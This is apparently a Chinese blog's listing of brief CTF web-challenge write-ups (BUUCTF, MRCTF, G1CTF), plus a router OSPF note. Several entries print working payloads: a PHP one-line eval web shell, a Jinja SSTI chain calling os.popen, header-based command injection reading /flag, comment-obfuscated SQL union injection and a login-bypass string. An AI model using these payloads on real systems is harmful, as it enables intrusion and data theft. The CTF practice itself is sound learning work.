m0_47940466的博客

原创 acl 1

首先先配置每个端口ip 地址 192.168.1.1等等 在配置ospf R1 en config router ospf 110 network 192.168.1.0 0.0.0.255 area 0 net 1.1.1.1 0.0.0.0 area 0 R2 192.168.2.0 192.168.1.0 R3 2.0 3.0 R4 3.0 4.4.4.4 0.0.0.0 area 0

原创 [BJDCTF2020]The mystery of ip 1

打开 flag burpsiute 一下 客户端请求头，XFF和client-ip都可。发现可以控制输入 尝试系统命令client-ip:{system(‘ls’)}发现可以，尝试cat /flag,没有任何过滤

原创 [MRCTF2020]你传你呢

上传一个一句话木马 <?php @eval($_POST['attack']) ?> 新建一个php文件 你post了什么 蚁剑的密码就是啥 http://fff167a7-d265-4626-a6fe-a241b5e8c0be.node3.buuoj.cn//upload/6d39f6d978ed8050484b9785fc9f43ce/123.jpg https://baike.baidu.com/item/htaccess/1645473?fr=aladdin htaccess解释

原创 [G1CTF2021]ssti

在括号内输入9*9可得结果 81 模板注入可参考 https://blog.csdn.net/xia739635297/article/details/104229582 {% for c in [].__class__.__base__.__subclasses__() %} {%if%20c.__name__=='catch_warnings'%27'%} {{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('l

原创 [G1CTF2021]easysql

输入数字有回显 在数字前加空格则会出现hacker 所以得知过滤了空格 搜索可知空格可用注释符/* */代替 用/* */代替空格 联合注入要输入 union select 1’and//1=2//union//select//flag//from//flag//# 用1，2…去试经测试 payload: 1’and//1=2//union//select//1,2,flag//from//flag//# 即可得flag ...

原创 [G1itch]simpleupload 100

原创 2021-03-28ACTF2020 新生赛 Exec

参考链接 https://blog.csdn.net/weixin_44348894/article/details/105347418?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnP

原创 upload1

https://zhuanlan.zhihu.com/p/137969179来源链接 创建一个phtml文件. 一句话木马: GIF89a  改 image/jpeg 打开蚁剑输入 搜索flag

原创 BUUCTF [极客大挑战 2019] LoveSQL

参考 https://blog.csdn.net/weixin_44037296/article/details/105084538 随意输入会得到wrong answer 这时候输入万能密码 /check.php?username=admin’ or ‘1’='1&password=1

原创 2021-03-23

打开网页 用bp抓包 可发现pay.php 输入 用hackbar post password 404a 还需要money100000000->1e10

原创 2021-03-22

首先用disresearch 找到 www.zip 下载包打开index.php class.php 构造序列化 保存文件执行一次 可得 参考链接:https://zhuanlan.zhihu.com/p/137898056

原创 2021-03-19

[ACTF2020 新生赛]Include 直接搜64位编码转换 即得 flag

原创 2021-03-14

1;set sql_mode=PIPES_AS_CONCAT;select 1 链接 https://blog.csdn.net/qq_43678005/article/details/108101904

原创 2021-03-12

https://my.oschina.net/guizimo/blog/4262891 附上解答链接 找源代码 从secret 使用brupsuite 可发现隐藏的

原创 2021-03-11

answer: ?cat=dog----->flag 使用万能密码 /check.php?username=1’or 1=1%23&password=1

原创 baby__web

原创 2021-03-02

小宁发现了一个网页，但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} ) 题目场景： 用 转换工具 将16进制 转换为10进制为55,56,54,79,115,69,114,116,107,49,50，如下图所示： 再用python将其转换为字符串为 786OsErtk12，如下图所示： ...

原创 WEB题日常更新(持续更新)

题目1:cookie 打开网址 点击f12 打开网络 点击第一条 直接搜索cookie 可看到cookie.php 将cookie.php输入网址 后再点击f12 点击消息头 即可查看到flag

原创 入门 ＜小白的日常整理＞

题目1: 下载附件,将图片格式转化为txt,用记事本打开,最后可卡到unicode编码=>AscII码可得 网址: https://tool.chinaz.com/tools/unicode.aspx 题目2: 下载附件 将word后缀改成.zip 用7-zip打开,找到document.xml 即得到 flag 题目3: 最基本的摩斯电码转码 网址:http://www.zhongguosou.com/zonghe/moersicodeconverter.aspx 打开网页按F12 查